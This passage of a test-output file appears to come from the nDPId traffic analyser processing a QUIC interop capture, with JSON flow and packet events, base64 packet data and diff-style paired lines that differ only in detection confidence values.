QgJ\/yLYnzwcGUMmDxb6+\/Vcoz11hXvHqUfteaUIZrZlPS0IAcPwJ9uUM82Vts2gh0ZtKy1HVF7COtP\/YC8n3yaj2Z4XCxABH1JI1+Gr7s05Sbt7Ydmm0MEi7M4Z7H69xe5sGopICwlQr6BDij0IG\/Q72anBTWx1VNl8l1hae+l8TMmxGeMu9i4blZH4yTZVGbr4Ufrnumx\/iFAYgWQeu6awy9bpeZT5O+xG+rCa2YUWvEwAHwQqGOTLiHRhLqf8bOiysObXTA3QmobJfgdxg\/kMNWj8xUdfAzQUKJYelBbMXT4qn\/A\/bgLMic4ksrxyPSpiS1e9XYY4TcxnGgHk5yxCxuwpm4+S16PEBC8SsJHkLxhM+Pyqg8ZbbK5FBImfMzUEZil15pbURRUjvlZtdskfSyAHSxSF8X4o0JXfUlol+bcOL6ItmB+wzIiN2Q+yijFIXK6d9190X\/aYna6Y1mhBOG0n2BfyedI+P25jlTZHPzLP\/m0eGz0ffpvLil2huLTMVVoPDTaIcLulULXUi1mSE5WxlWTpZdPkeFyxhOecT8BN8ugPHSRdq1YlgSaIwZavu\/XO8PCMiEMZUs7LNob+kHoiN1Yitx+SOUzM3Rfm4SCIMQokalKEYORgNek9yKJq9ysRafffBGVrxSm9fUQ2\/hXog43g3kKJn1+L45W1cDgEOnlzcbSC7mXNgzNI\/9oSvf+verPiM6qHPGSAL45mMH3aGyYMFRQjcVYI49Hhcw\/awYPgb\/M54nczqpco1saP+lU6ffHEwQVDtkjV\/GpfILnkEXC+cQL7juo\/ky491nkMGs1EkNmbbJTwPGVUqPiFcdi\/GoRziaE35KsbCh2pXltXGH77CIkJ8z4h3pP\/kBhLJUXL8fmE9AqMsqW5zCCDLfMDqTPSGLNgu12FdfjnQIvupRRH4Ge0\/B5Zgz1NMHbBts+RgS0Xaxftf2jPR3SxbRu77DVdYw9vVWXM\/R9b26Kxk+mp4fmYKTS6dblfvsoHkgHRfoRp\/1E4eszlorBw59xoTpzT7xgKofVDBGY48JKd52r
imDD8\/5N908wmgggGjc\/EEPQbILqIqgEVu+rqihenG\/3x1vbCDXllpynW3aJnILkUHNWbpfDPatq0AQGgN8Op2ovkZNf\/lP0t4iCiUxmNrrEYAIJpsoCwFTBFOv6YhOZgAb9RxW9d3SCROp5nmqJ9Q=="} 02149{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1603816434765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUApalAAEAReTTAqAGAhfLO9L\/\/EVEE7ON5xgoKCgoIFbSGVwPjC1AAAETSB6nk7BQZ0n6OtRMgfqRMKv0mmF2ZCcJpOh5y0A\/toFlOz1fz5pBGD1YqR4r423K3bLjZPtU8zEdGrInkcNVS7Z9ZXa9KjSFkO6ZkCM+bgjrlPSYegWgr+lf8Seik\/OAa+9m4F+SKC3n3FYnChgcugjttcabtxcQG9UUmURCrO7eKZHimNrioYr36+LduCnNt9LNd\/zB6gPQej59n1H2PIibmagW\/fM66aVsVaR7zVHUCiH\/Qk70XwReQUNqQdtSK1o3x5foHfXLA3D5kXGSVsWki0olqZxxN4FQAu5\/vbJypl6cmZI9OG9mEaVsP3cQN5V6DcyMwwFq92zydNBh3eUgEPN9OuCoA1RCaRF2MY0ZRrUi4a0NGDiLUCV+G4SlLziz9xOJyHgGzjLPAE4BCeRh\/v6+wEZ8mgKyLD1EAVDV3zN30JJ6M0Me3hNHEEbe3VogRVZ0JV6CPYSKozfqmRIa1OO7TLbpqRx6m0yU\/HDbQvXQVvGPqTESIeDN9OWt+hRw0H3fhD\/0jWSUXeT5zzK0QccSYs9OMt6xct2EsrhYBO1aPATDoyaZAvzwTNWt8Eo\/XQktNf5jtBBlktbQBo67n4yyIo5rxgyPWJpQuRO297O7Mat4F1YWbTtTthkWIST5XlLQDR9sjWJQZoLrrVPuOGNaGgLiWbJpKZkPAmpkeoL2fbBEubmo\/7AK73pscjnUsQfmTU2Lhlzk7lE5KZzfdO6Ojycq4INOAlTRsxjE9Zej3obzZ+qt62gpD1eMqQQ4pmr3v0LhMGBrSM5EJ3Lmee9+dMb\/4XFUcIqSZvmCu1M+oA1IifmzxY0YneJ0hq33tjmK17Y6LsqmZvgvIsEtHUfp0429tqiTnJ7jEj9nv1Qws03vEaDx+VL91DFUBUZJsS2cGo6zH4U5+3ALd1d9yNs8qALm9NC2sFDyPeFu+wcrail+CekPau3rfVm\/\/BKg6uu98kDdJCbd1K4G6Sqm\/PNtzcVB3Yj4nmpQutpeBoYu\/N\/9zeylcHDDY+njAE8iIJji89hsMpr06VVSWYUsxYktuKVqxiBHUsyn1Qm+B+LGljetv1Jxr8cQu2ysaGbDgZRBSueKSbvXGNWhWLq7YBfLNgLfLQd6u0Si9aGjm8Is9C7byUaZ2JPKY6uJyDHXlNjc8po\/+0JxVFx+TI9y4r8FR94PIlv+t0snjZMMmWVUUkN9jPEM8reQ6rFbrOw2FyLxYpr7e6DBlYpr1rXi3y2AXbHOBjn\/yzFASJZWgEwjT9kc8\/kszRPabFnemr71tJxRnqsT7Z8rLpEDPHd34XFyRMJy5FhlpGRF5xBBWEPcYiNM4ACXS2zaqVvc4
Ob6UONNiC5nq2MkrUel7u0fH3y+QFu5zcqtdETTA0rau+rX839r2M0xAous9B\/DzSAmhABN55MwenMuZXqKqO87\/SWuW3bCHCwmA4YTm0Y3MW31xmUfWCARViMQoMKL4e47lsZJmCw0S76EdXYT\/tkaU\/XJ34K+CTAC9yoTmJCAO9jIFpf2oBzdts69jtTj6Cw9qgKbQnkEP\/wuWHtVAcedrnVjSQu7O6Hr86jboN5XBirNkD\/k3Zb0R5f1hF1X5cR6OxDuouIjIFrBbnyzMLcWJq+pJzxbnTW8A+JnK8lKA7Q=="} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 02159{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1603816434766,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434766,"pkt":"PKn0qB\/spJGxgjQ5ht1gCcrWBNg6NCQAiQIAAAAA8DyR\/\/5ppFQgAQsHCsnVrqTT\/kdpHoB9AQTxKAAAAABgCq04BNgRNSABCwcKydWupNP+R2kegH0kAIkCAAAAAPA8kf\/+aaRUlL0BuwTYjlPGCgoKCgjBjvWe+MPFRAAARL4AnyCwAgoQjL1g+KDURvDYeEyLw\/xCRk6Dll3vQteHoVQFBQKAtW3\/PUJKxA75UMcNXhZUvkOXlYopsWey\/u66wX35Pj6pU3CXAqQ3fDp5zyCvr8Pm5AyoNAx0veCSUQeDBYfIgnerrrO2MEGoBqYPiiUt8xe5+r79P3P4ZzDRVupqGycbUWtQ6Wo6aZSD05slEqoyPBAaLp3YhydnPgb7vRWFjq0SdM0H\/zxBdY7aJ5VQRGeFUx984uZ\/K6yeMGPT3JYsoR6JIONmbNNldMQuEP+a7GBJ3iEWFJ1Nkel3g0iBwZRA7TTHinpesR5BAPJGKsJg\/VS2BeEVhnsQklM+ccg8cEJ\/WZ8KGZKu2b5eb3vaAvV55IOI0J2iO5UmLyQCl7SbwQC4xeRqoU1X\/r4ksMW+JxOVqFoTOp0p9K8G2C+kXU7PkGNUF6LWJgz0gBnPUfLEiLYep+IB3ydQMSXFv2q4ljMWpImZsfM1M1hyBHVdu
tiac3ctGpn70sK96\/GuFpnGs5SaPUZPVAd6cowQNyios9VD7LJHBycvPPV\/FVVqGKmtlmE1jhqYU8WM3TP2hIDFKj\/VkbTWINB6wKhdoTjaE++G5UWOW3DyJNvkrdNQDmb57TWpCvvDwZ0zyc9+kjM1P8gJU7fxklAOWt77tLOKjqKz2yyGTywbYI8fpyDxuwcOqHHM1p9Qo2bUMzUDDc5AgR5XXK8f98\/2k\/szEHoOj+xZ0LAk\/ktl3\/tNcCYf5NwDCkoJ2SA+A3liVp\/z86DQ\/o9ZPBbnT\/MRpriiusVj\/+7dyNzTUlosBxg\/ZTGIAFG9kkbqpmlXa9h8whQ+M5AjGTQXahgxhUg+T+XkcD3\/AwAskzg7QFF8QOQvTkgKR27pnPB9TcW0ov3zRKBSq2IRQasfzD4018QjLIoL6M1i7zKWOriPXhrbpQCBMed+qy0CCutCqcHfM5C6tdP5yjdd03xLltagPaoEJdMAzkTI4GTxawZxV\/nJEB2CpfHpXBAiLmSF3pSqQkOlK3gecF6Z5kJRZxdfHFiYQc+ZeBxM3ZsG9j3S6poeVhWhKtKijv579ezhO7g3QE97akiUNAtC\/9u96VNcgwwZo3pYzoh+bmR12ZZk\/flZDnZgzTtqeO5zikP6EaDg3xt4ZqzYpvmcwxx5bFkZ6tYCa\/WSn2OsS\/V89R9JkA+p04smS\/E7zSLxIHIjg7ziPRYLmF24dGHz34FZmheQHZ\/4gm1aFmIaG6\/7f5wmQDqHrB8QpqkJoLkDgUUHwTgyqeLrCOeAdu2eQCQJ4129kNDhXnJ7gWkCKO71EQxgH1wOzb5+V8dr\/jGNAAVFaptYOiLQes+Et0OXv\/4vGauirP+hYZEEAR3InBIIg\/L5KPxSdMCpSCm\/3UnE1zUNlTk7El74hPsNYUcmUS+usyw22jx+xLs4q3Kod9YDt4DrToci+qgaxSPs+xB3bX18DBMDyb8wNM5xFrlJXeWv7YCCDubwS+dnWseGEwnfJTp8dJgKhqy8jDuI7wNl1iTi5TWAuubz7G08V4L8udRmpqYJpILlag=="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 
+00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434766,"flow_last_seen":1603816434766,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434766,"l3_proto":"ip6","src_ip":"2400:8902::f03c:91ff:fe69:a454","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 01194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1603816434766,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":590,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":590,"pkt_l4_len":556,"thread_ts_msec":1603816434766,"pkt":"PKn0qB\/spJGxgjQ5CABFAAJAgWgAADQBpMeDnxjGwKgBgAMD5agAAAAARQAFAG8bQAA0EXREwKgBgIOfGMa+BBFSBOwcysIKCgoKCAcy61WfYmyeAABE0qUiGIQ4aIhBbz9agQnzKFP+Ko6UG2\/VO43Zha3PL4kqY0AO3g0iECAhk\/6ZwBC4N756XgQuYU60gIOctL9zb4\/OWAg0WA1DbWYP4KnPZTIp669qsv\/rQAibIfU1C4jJIVVwUvw56ggX1ZWtsSkpVhlWA38X41jyzp4YyuLbkb3bAYN\/EIWaL4EMGxO+IKXjPgtJdchWUK\/9x2bQrLTQrTrt1LVvOFtezyOxX3HU59rOyjLCliLHhymipAdeA2iilJa\/G\/jNCnm92iYqQ99y1tLbXGL1SO3nVuTvR5sjExBx5iwaDhDbYKtasZmgPHXFcFC5nc+7+wPPW5yfWD1laEE\/wGN7z2vQj3O2l8846UB817y5kdQqfJcn3ryUAQboDsw9RBRvujkaoMcMv7dwDFaulIkwKjh5NdGImH6DlqdJnNJe\/djBGIoTx+FNEOCf8VgkH2AS3NkcDuSUvP6wRjfzpEDMKt1+bfZxTozz2QUXP\/r1d5e\/ChVkzBO9tgTIIsrdTwdCDHK\/8GPaAe9Z9\/eOLqg1E0MYdvN2a123wOsPL+4jXgdZ77SJH2U6Of\/XWPTaYlfaheABwpiMv6I00YAPVCHV\/IRMeTtBZrb8p0Ppi3qMyAgRXlwJ6aGPFOXZdGvMJWgaWpFkLrTD65P5wK4ostYxbEc="} 
00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 02142{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1603816434772,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434772,"pkt":"PKn0qB\/spJGxgjQ5ht1gDK7JBNg6MyABGfAABAA0AAAAAAAAAAEgAQsHCsnVrqTT\/kdpHoB9AQS44gAAAABgDEm8BNgRMiABCwcKydWupNP+R2kegH0gARnwAAQANAAAAAAAAAABrNMRUgTYSrXMCgoKCgj2S26kHUj2aQAARL4Oqb7kxp8VwqfBhPdfdtQhtwUXSB8\/M16zqaKTaiM4uFSCgiApTua+W3aFO11E8\/vpjw5fdiBSABUTDotMg5RkiQr0MSpUaARnrP0PNMBaoZi0T3torsgUpfH8Z7GKLvwTGd3hbCPXQz5HEzUHjJnObkXYOU8pDBMRAGZYnp5rkZbRT2vPBVCj8Cvx8bBBKneUgl1FG4uQ4EwyOma55O1RYgmn2Ynf1Ko5xhvyQTnOGQ+R1VyW0n7heo02IMCfY4VWPj\/QJHyKTPMBIDBtSvz3J6mf3nv69QC6K+3y7kTFVD4RNSmXPDKfJ4r8a\/jVYQ3tiwvsysKnCLgA5zby1+dfPHEiaiwawfH+cKDMssE48zXk1+MDRnahgP5\/5W7h5R0W7WQX3skNYTREacQ3LvDACn58ERfFzl2AshIb29QMiGQj+aXYqT7ftIu1mYCEtR10HqM0E0tdjMJlVoxU1sQCMNHCcSjur932nDLMq95bmJ\/epzRqKtYXqFfJm4ZnhGTZV2QZB+hX7pNkAbrVOicdWh6ASPsIKRVzbgM4azW3TFLOWbFSWksd82BdcgW3kBeZ+Zy87igudzpPx0kdISA+wUJUrSUaJmejNXcUK68sicz01uq+5FBxl7uzJB5i2OXGU+jvmL+lkKweCPtvayVLhcuvz7KLW1nrXu3HU\/E\/bgsaTJyGVokl31OFOSR9LQtdKuoewFPyn5r490C8zNMeXqpImt2kn4Tr\/jlH\/fxzyim4MX4msP404e3jLfo+J9lzJhkenDu9xAnUgd\/iKSb6RgtGPU4Y6NI2QNpIfd6MzugcP8a0lod
ftPQcResoW35Hgg5t6I+PqN5frd2jtB5RiFyFN6yYVSH5fwqpb5sgLyM2ZMvumoV6ZVCMO3EMaRJu6f+U3CDduLYbXqPjXTUFXnzx9Vt03+YreNFX6wa5PrrBlSKMZP\/2WAmhb8cWINvyoZmFlnI2qd6sXg1dpFNY99Vqu1GrXPgV8Qi9MxV9uHzluuqG5swDMVT91S3LeU6XPmicYuwxrVZ0fDoeWpn4Kta0sEVDVUOf9hI8REFrn\/lLtMViNZ5rtWhIMKLyMIne37ob1RynB8J3PHqTTUqyQWLUmsA7XpXuycyFg0eDsVEBgiX65miUosWBtlhptbWoDODs0zqjlEGqOg5rKyio59+SI+p7jTV93mdfy9Wt2QGrnsPSiOSsj\/pqM\/pZ2PPrcgdTK9VPceK3CdsRz\/jNTpieviefPJXgnQD9JDKvgbRzI7jy8hldn4q+BSAvi3W0FwGFIYHJsgwTS2D+M4jyoohPca8fHwPwrKPUAytl3yLskOFTcOEOwWAP0YkHc8DSZIYnWDfZRitncpUl9qEcnjpTihvHHfw2HQxFR5lkMlUwBOL06kpNLUObIMz0gJ8az8O5U2MJseOwsScI7UtAgMA1Wat1Jr7S5b3fSl1DVUzvG0hnyrSZS2C54u89rSG8QQybBKCeSDnq1GpKeq\/O7HdjP04WmFuLDA\/vf\/9lSaOXhNpEErLndSFsHzNaPYP8EGwGI4iaWZOfcrm8Fw=="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434772,"flow_last_seen":1603816434772,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816434772,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","ndpi": 
{"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1603816434776,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434776,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAYA1AAEARdrfAqAGAM55pYqrXEVIE7DzAzAoKCgoI2nqja59HDyMAAETSIwUh\/jjSyce1pBuktMAn\/9fQVpvzsj8X4f6zzIa5zUMyPshEJVxx\/HgJpy2DounAtWqOn7MykfNk1iAT6IFLl5JJDlHVUgHekilaBHXQFm7iNuBD05oF1B0F7q8Qrx84dCVbjPq2TzzI4E8Jn0w6eGKEzj3zAOYyN\/jtcSwUMH\/tdAvJ2KZeRWAZwgBZ+NHFpdpJskxMoq8BiazR6NmdCcDVWJJafWv\/J6n2MwHgdrbXoHD7z9vBv7OTw1ZsmRTWOginovLBtLwEow12QHwK+3EKlGb67Dikjj6Hsiva+EHGjyXXT3NafDD2Mdy+tEkICJVPMdfQgSiLKciRXmF+eiaKhn6t+ZZDXwMIx1tObSDzE+o6+VwUniuIqDp4P1P\/ToVtD+B8x7Pd8fdBpJ4GLav9M4cI3Wrt3ZFYV3\/N8JUWUnnIryRD+gsn8U6xZxSihwbPDnANbZkkqUwtRBWNdvrID63JeJlKECXOhipg3RPgW+AtU7DD8FGCQwK077KHK\/4iE0FRnsfBWs4NiPYWSuDiKbOCzUPifBciRr8tMI1kDMDYdqhOf\/t2cQwVRdaNiCXpVyvtWa68KE7YuTZbjpI5Zm9LOCld3hJ01MiZ7LFRGruZgu66Qt6cNK570mj580eh0jpjgWEGkDr8jkE8qlxmZ\/+JhXsVQeSLOCJpxCPnoKcC\/AgENxJJFj5QqhvZ4\/+S85TLqOVPU75k58aRkk+ToNWPiawuoh+7ZmQNuVNQVgcCtQEXQJu346G7rcjTAKMH3PDGS8OBxREkqOUKIE\/fJzE5mkwFxduFK\/B7NuaeUP\/
viNgVQPK+xx+1Ngb7A4VcDPdAPTWKWgbWpoEudTGTXV58El7GU8KydW+XNFItpFzmhNuEFbckU8GM1h8hyV6YxNQ+Ywvmqeqx+Qpa2gsPfebPvZhoavla3sgCdU8L3Fi\/gojIsV72icFiRHpi7wgSeg+dYFEA+ApHg9oKhJJhp8\/wWsOTm76uoFhEbKbRL2YPAgB\/Ql+puWC+1\/d1JEz2eZaAp5Zo4yW5zTvhxVsa5hrrLnPK2t90EkaeWT3kM4NBLrAUyq7fPgZ5preHWxkcCRzxymqgt+6Xj2oWVLVyaqWrzsHWrurGOxbP60QM5pMHY613Q+LrLNvTCsh4ZQzv0k2FKQRVr9u07bMlGLVO5kHK8AlGOnI97GL1hRF\/kBPlbHravjlbftLM0ZE+ofUKm3FCAyqpSNR5f+azjzb6QBklYN+zHv4anLf2bRojetf7WIpCzUtOun8gE3beg5nRdzOcNC5G1ZAhS4QZYrCUyLzy6dQnaI5ti\/HjmSldcvKZM0X8HEANm0ee5l4G\/rQp3samcnQbFsOFm5GfplnfCVyDu6SZLaWZt28o+RfSwBU5HTnFtZyilWnthqnChfP+hUfiDQ1asKcjklc33MY5RFlJ6ek8gI0+BRbnKE7zMoxaJ8oo9BJU12dwyF3tndCM1wJjl2MBm5rkAUb1j4xIIVUrcA0Os8Qp7MwNsapkh+lLuE3uc7vgFLS327NgSo9rR6EA2jIx++BL4omb8CcMSEd5E0h8ER2PPQ2Ijvdcaa4AGZMCHiMkSxGpTa9jY4devoI6nqBsHtnxRjt+CQUUD3xf\/+arnnuqKk3gOjeyEQ=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
+00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434776,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.seemann.io","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00544{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1603816434779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":109,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":109,"pkt_l4_len":55,"thread_ts_msec":1603816434779,"pkt":"PKn0qB\/spJGxgjQ5ht1gC0dvADcRMSYEqIAIAAChAAAAABJ5MAEgAQsHCsnVrqTT\/kdpHoB9EVLSAAA3EH3TAAAAAAAI6BdjXmXwmldRMDQzUTA0NlEwNTD\/AAAb\/wAAHP8AAB3\/AAAe\/wAAHw=="} 
02153{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1603816434779,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434779,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA7X9AAEAR3vnAqAGAyu7cXJgVAbsE7F0\/xwoKCgoISaS\/HP4FIE0AAETSs+MVmuG4wpmNcPXwiwbgkyhiThvn0LHBRqHfn+gXOdfthzxlp0ltI03pZKw9vyqEYoBiUoMOALn8iwjEM1bBG0sKOHNmuafb9yKJq5CpXdfVW9fnnip2p1tWnGQZccSpOc1uq0bHiGjb10mg3cqpILSGktAMKwPjSF47KMJxZp\/l9ao1+O97nqhSrQZgHoEMImlI7ZCND\/wyqspL+eu6NAWz3rU9vba3BnFw354DNfuXu8HOGbC3Guvt9ytqxi0Yz5DSI1kvCcdc1n7wT0BoaLVFB\/yV1s2y5v5nH3DzJd2ACj9o\/zmaZyMpvWCTRg29elBjIR6fiI98dZm7sRE0VcNIEEqTNqSeoXcWt5unTNHBRYj7lwzoPoXK2TUjG515g9q9fHLJbLWr6\/hB+vEJG6S7dsFN6dIXdTpgqWHu81xJ1m9hfY7AkYBIllm4leEOWu1SRr5c\/AEsknAD+6XbQas8XXqJRRnDaBD1csMJtZvxoVWNSuOHBfOUyiZ4hDYxHjMLTLGygYFsDHCP93SCma0J1PrsKV4mBTWbhdzxAD3aoMxgjoxla8DQxuClSD4NOC96GJ+rdubJmMLxnEpF5JDa1IKuYrUXV3w\/4wQZqtP7g6zDf2GhddDBCDNr7yc+hg+5ilxcgcb2MVoLkgX1OkizCx2RSfRb0eK8thsruCLFSby4jO8bsuNj\/DwRHrD9ALa9P\/tMKNqD\/QB3PCX6uMJrfyT324LeetrVxPvOBvrQpiJegaN9JcarJLQiUBPGBrK+q6yGhmqia+H4CTzm98FspAgFJ3pIDJit2uCN0awhg2fUthbI0kXrjD+YpQbOi0QPuM2dRjqPXjXqrT+X2FbVUvVA37Xe2HlgHJQb01jyc3xry22J8\/uMKksqV4OfH9xACygHSWKGL7403rhhUIh\/1OKDuete+v6YGMI6HZHwxepcu1MBc8\/3NDyIJT7pGaR74MXwks5nUPSMbWXdz5gpe86RgRisPos\/HQNeweIwtPmU7vDULxHYQYbZJm932INOf+U0JuYM9\/0yyF82eovZ0gS\/AOY09vwKYKSps2BcZpcxKZJ6olMmG8Bd8RL\/TLXZh8OzsalyvubiZwD